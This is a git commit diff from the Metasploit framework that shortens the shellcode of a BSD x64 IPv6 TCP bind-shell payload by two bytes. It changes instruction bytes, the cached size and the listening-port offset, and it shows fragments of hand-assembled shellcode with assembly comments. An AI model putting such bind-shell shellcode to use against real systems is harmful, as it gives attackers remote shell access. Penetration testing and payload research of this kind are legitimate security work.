Save two bytes on shell_bind_ipv6_tcp
parent
88eecca4b1
commit
04879ed752
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
|
|||
|
||||
module Metasploit3
|
||||
|
||||
CachedSize = 95
|
||||
CachedSize = 93
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Payload::Bsd
|
||||
|
@ -31,7 +31,7 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 21, 'n' ],
|
||||
'LPORT' => [ 20, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x6a\x61" +# pushq $0x61 #
|
||||
|
@ -46,8 +46,9 @@ module Metasploit3
|
|||
"\x52" +# push %rdx #
|
||||
"\x52" +# push %rdx #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xba\x00\x1c\x11" +# mov 0x000000005c110200, #
|
||||
"\x5c\x00\x00\x00\x00" +# %rdx #
|
||||
"\x68\x00\x1c\x11\x5c" +# pushq $0x5c111c00 #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x89\xd2" +# mov %edx, %edx #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x6a\x1c" +# pushq $0x1c #
|
||||
|
|
|
@ -47,7 +47,7 @@ module Metasploit3
|
|||
"\x68\x00\x1c\x11\x5c" +# pushq $0x5c111c00 #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x89\xd2" +# mov %edx, %edx #
|
||||
"\x52" +# pushq %rdx #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x6a\x10" +# pushq $0x10 #
|
||||
"\x5a" +# pop %rdx #
|
||||
|
|
Loading…
Reference in New Issue